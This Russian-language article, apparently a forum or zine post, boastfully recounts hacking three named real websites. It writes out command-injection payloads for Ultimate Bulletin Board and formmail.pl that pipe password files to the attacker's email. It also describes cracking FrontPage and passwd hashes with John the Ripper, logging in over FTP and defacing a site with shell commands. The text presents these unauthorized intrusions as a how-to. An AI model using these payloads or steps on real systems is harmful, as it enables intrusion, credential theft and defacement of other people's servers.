Взлом серверов на конкретных примерах Введение Все началось с того, что сидели мы в IRC - я, Ozzman и /cdn-cgi/l/email-protection Sun. Время было позднее и я решил идти спать, но вдруг /cdn-cgi/l/email-protection говорит, типа, гляньте сюда http://www.kungfuklan.com. Я решил посмотреть и попал на страницу какой-то то ли Корейской, то ли Китайской крэкерской группы. Ну так полазил, огляделся, зашел на форум, посмотрел релизы, в общем мне понравилось и дизайн классный. Вдруг мне как 2-ое чуство говорит проверить папку CGI-BIN на доступность. Ну ввожу я http://www.kungfuklan.com/cgi-bin/, и что вы думаете? Правильно! На этой папке был открыт доступ и можно посмотреть все скрипты. Как раз за пару дней до этого на сайте группы DAMNED я прочитал о свеже найденной дырке в Ultimate Bulletin Board, данная доска и стояла у наших самураев. Ozzman так же приметил это и не долго думая сохранил Sourse формы где был Replay и дописал в поле topic следующие: Код: topic='012345.ubb|mail /cdn-cgi/l/email-protection Но к сожалению пароли были в Shadow. Мы не стали огорчаться и поменяв строку на следующую: Код: topic='012345.ubb|cat Members/*|mail /cdn-cgi/l/email-protection|' получили пароли в открытом виде на всю доску! Но доски то мало =) Начали исследовать дальше и сразу наткнулись на дирукторию _private и файл .htpasswd . Если кто не знает - здесь обычно лежат хеши паролей FrontPage. Так же и в директории _private лежит файл services.pwd и тоже с паролями. Поставив john'а перебирать пароли мы отправились дальше по директориям. Не найдя в общем-то ничего полезного пошли спать. После 3-х дней, /cdn-cgi/l/email-protection наконец-то расшифровал пароли но они были от FrontPage, один из паролей был kickMe, мы решили попробовать его по FTP и ура, ура, ура, пароль подошел и сервер в наших руках! Вот к чему приводит халатность… Админ (видать поленился придумать другой пароль для FTP, или забыть его побоялся =)). Просьба ко всем, если пароль еще не поменяли или не заделали дырку, не наносите никакого вреда данному серверу. Вот так был взломан сайт клана Kungfu. Спасибо группе DAMNED, за так сказать вовремя выложенную информацию. http://www.w-three.net В способе взлома этого сайта нет ничего нового и оригинального. Это скорее пример для ленивых администраторов и начинающих script kiddie, чем полезная информация для мало- мальски знающего хакера. В общем дырка заключалась в присутствии на сайте скрипта formmail.pl by Matt Wright версии 1.0 содержащего уязвимость позволяющую выполнять команды shell. Об этой уязвимости можно прочитать в cgi-bug на qwerty.nanko.ru, но я сам попробую описать принцип действия: для отправки почты скрипт использует следующую строку: Код: open (MAIL, "|$mailprog $FORM{'recipient'}") где $FORM{'recipient'} поле recipient из вызывающего html и $mailprog='/bin/sendmail'. знак "|" означает выполнение команды shell. т.е. заменив на выполнится команду: Код: "/bin/sendmail; cat /etc/passwd | mail /cdn-cgi/l/email-protection" которая отправит файл с паролями на /cdn-cgi/l/email-protection#85ede4e6eee0f7c5e8e4ece9abe6eae8 Вот в принципе и все что нужно знать для использования данной уязвимости. Теперь вернемся к взлому http://www.w-three.net. Мне повезло. Получив passwd я увидел там hash'ы паролей, а не "*" как при использовании shadow. Так как для данного сайта меня интересовал только deface и мне нужен был доступ для закачки файлов, то я выбрал всех пользователей у которых был доступ на ftp и скормил их john'у. Он сразу нашел пароль для пользователя gast - помогла буржуйская привычка ставить login=passwd. Во взломе помогло мне и то обстоятельство, что скрипт принадлежал и выполнялся с правами пользователя имеющего самый высокий доступ в системе(если не брать в расчет root'а). Я мог читать, изменять и создавать любые файлы которые принадлежали этому пользователю, а это были почти все файлы. Ну что ж, я имею все возможности для deface: доступ для закачки своего html и права на перезапись index.html лежащего на сайте. чем я и воспользовался: Код: mv /usr/local/etc/httpd/htdocs/index.thml \ /usr/local/etc/httpd/htdocs/index1.html cp /usr/local/etc/httpd/htdocs/gast/my.html /usr/local/etc/httpd/htdocs/index.html \ Вот так "плохие" пароли, не правильное распределение прав и не обновленные скрипты могут способствовать захвату сайта. sinobord.hypermart.net Всё началось с того, что Lynx рассказал(а) мне о commander.pl (даёт возможность исполнения команд как на shell кому интересно сходите и почитайте на http://www.hack-crack.com )и я стал искать сайты с этим скриптом и нашёл. Этим сайтом был sinoboard.hypermart.net (хост http://www.hypermart.net), как не странно там выводился листинг директорий. На некоторые каталоги стоял пароль (я бы сказал на все в которых могло быть что либо интересное). Использование commander'a дало не много файл паролей, который лежал в /etc был, как я понял от http://www.hypermart.net, но там меня ждало разочарование все пароли в * хе-хе… (обидно понимаешь), а master.passwd не был доступен. Но я не стал разочаровываться и начал исследовать все каталоги, на которые был доступ без пароля. Много чего там было и чат, и доска объявлений, и всякая другая всячина. Так- же там был и скрипт fileman.cgi по сути это файловый менеджер. На запуск этого скрипта пароль не стоял. Я стал смотреть содержимое каталогов через него, и какая же радость он не требовал пароля при открытии каталогов на которые стоял пароль. Пройдясь по каталогам ещё раз я нашёл то что мне было нужно, файлик service.pwd в _vti_pvt. Кстати этот менеджер давал возможность редактировать файлы так что я мог сразу записать новую запись в этот файл (наверное), но для начала я поставил файл на рассшифровку (там была всего одна учётная запись), и буквально через две минуты у меня на руках был пароль, он состоял из 4 цифр Для проверки зашёл по ftp всё работало.